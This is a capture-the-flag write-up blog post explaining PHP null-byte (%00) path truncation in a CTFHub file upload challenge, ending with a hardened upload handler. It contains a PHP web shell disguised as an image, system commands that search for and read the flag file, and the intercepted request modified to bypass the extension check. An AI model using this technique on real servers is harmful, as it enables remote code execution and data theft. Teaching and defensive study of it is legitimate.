
PHP file upload 00 truncation

2022-06-26 15:11:00 Yale letter

0x00, %00, \00 and the like are all the same thing, just written in different notations, much as 女朋友 and 女票 both mean "girlfriend".

In a website URL, %00 is decoded into the byte 0, and in ASCII the byte 0 is a special character (not the character '0') that marks the end of a string. So when a URL contains %00, the string is considered finished at that point once it has been decoded, and whatever follows is dropped.

For example:

https://www.yalexin/?file=test.txt

Here the output is test.txt

If it is changed to:

https://www.yalexin/?file=test.php%00.txt

The output is now test.php: everything after the decoded null byte is discarded.

Let's look at an example:

CTFHub skill tree - Web - File upload - 00 truncation

After opening the challenge there is a file upload page. Its source looks like this:

<script>alert(' Upload successful ')</script><!DOCTYPE html>
<html>

<head>
    <meta charset="UTF-8">
    <title>CTFHub  Upload files  - 00 truncation </title>
</head>

<body>
    <h1>CTFHub  Upload files  - 00 truncation </h1>
    <form action=?road=/var/www/html/upload/ method="post" enctype="multipart/form-data">
        <label for="file">Filename:</label>
        <input type="file" name="file" id="file" />
        <br />
        <input type="submit" name="submit" value="Submit" />
    </form>
<!--
if (!empty($_POST['submit'])) {
    $name = basename($_FILES['file']['name']);
    $info = pathinfo($name);
    $ext = $info['extension'];
    $whitelist = array("jpg", "png", "gif");
    if (in_array($ext, $whitelist)) {
        $des = $_GET['road'] . "/" . rand(10, 99) . date("YmdHis") . "." . $ext;
        if (move_uploaded_file($_FILES['file']['tmp_name'], $des)) {
            echo "<script>alert(' Upload successful ')</script>";
        } else {
            echo "<script>alert(' Upload failed ')</script>";
        }
    } else {
        echo " File type mismatch ";
    }
}
-->
</body>

</html>

As the source shows, the handler first checks whether the file extension is in the whitelist (that is, only image types can be uploaded). Once that check passes, it takes the road parameter as the destination directory, appends a random number plus the current date as the file name, and moves the upload there.

After a quick analysis the idea is roughly this: use a proxy, write a PHP script, rename its extension to an image type, then intercept and modify the request, and finally visit the script we uploaded.

First, find where the flag might be located:

<?php

system('find / | grep flag')

?>

Save this file as hack.png

Then turn on the proxy, open Burp Suite, and enable the interceptor (Intercept).

Upload the hack.png we just made in the browser.

We then see the request in Burp, and we change

POST /?road=/var/www/html/upload/ HTTP/1.1

to:

POST /?road=/var/www/html/upload/hack.php%00 HTTP/1.1

and click Forward.

After the upload succeeds, we access the script:

/upload/hack.php

Sure enough, there is output:

/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/pci0000:00/0000:00:03.0/virtio0/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/devices/virtual/net/dummy0/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/proc/kpageflags
/usr/lib/perl/5.14.2/auto/POSIX/SigAction/flags.al
/usr/lib/perl/5.14.2/bits/waitflags.ph
/var/www/html/flag_139938352.php

The last one is what we want. Now read the file.

Modify our script hack.php:

<?php

system('cat ../flag_139938352.php'); // Note: the script ends up under /var/www/html/upload, so go up one directory to read the flag

?>

Upload it again using the same method and you can read the contents (note: visiting hack.php shows a blank page; right-click and view the page source to see the flag).
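For comparison, here is a hardened version of the challenge's upload handler, written as an added example rather than code from the challenge or its author. It assumes the web root is /var/www/html and that uploads belong in /var/www/html/upload; the destination directory is fixed in the code, the client-supplied name is rejected if it contains a NUL byte, the file content is checked against the type the extension claims, and nothing from the request reaches the destination path.

```php
<?php
// Hardened upload handler (added example, not the challenge's own code).
// Assumption: uploads are stored under /var/www/html/upload and that directory
// is served with PHP execution disabled in the web server configuration.
declare(strict_types=1);

const UPLOAD_DIR = '/var/www/html/upload'; // fixed; never taken from $_GET['road']
const ALLOWED = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];

function handle_upload(array $file): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return 'upload error';
    }
    // 1. Reject a NUL byte anywhere in the client name before parsing it at all.
    $name = (string) $file['name'];
    if (strpos($name, "\0") !== false) {
        return 'invalid filename';
    }
    // 2. Extension check: lowercase, exact match against the whitelist.
    $ext = strtolower(pathinfo(basename($name), PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        return 'file type mismatch';
    }
    // 3. Content check: the bytes must really be the image type the extension claims.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== ALLOWED[$ext]) {
        return 'file type mismatch';
    }
    // 4. Destination: server-chosen directory plus a random name; no request input.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    // 5. Confirm the resolved directory is still the upload directory.
    if (realpath(dirname($dest)) !== realpath(UPLOAD_DIR)) {
        return 'bad destination';
    }
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return 'upload failed';
    }
    return 'upload successful';
}

if (!empty($_POST['submit']) && isset($_FILES['file'])) {
    header('Content-Type: text/plain; charset=UTF-8');
    echo handle_upload($_FILES['file']);
}
```

Current PHP releases refuse filesystem paths that contain a NUL byte, but the fix that matters is structural: a request parameter must never choose where an upload is written or what it is called.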


Copyright notice
This article was written by Yale letter; please include the original link when reposting. Thank you.
https://yzsam.com/2022/177/202206261451204535.html
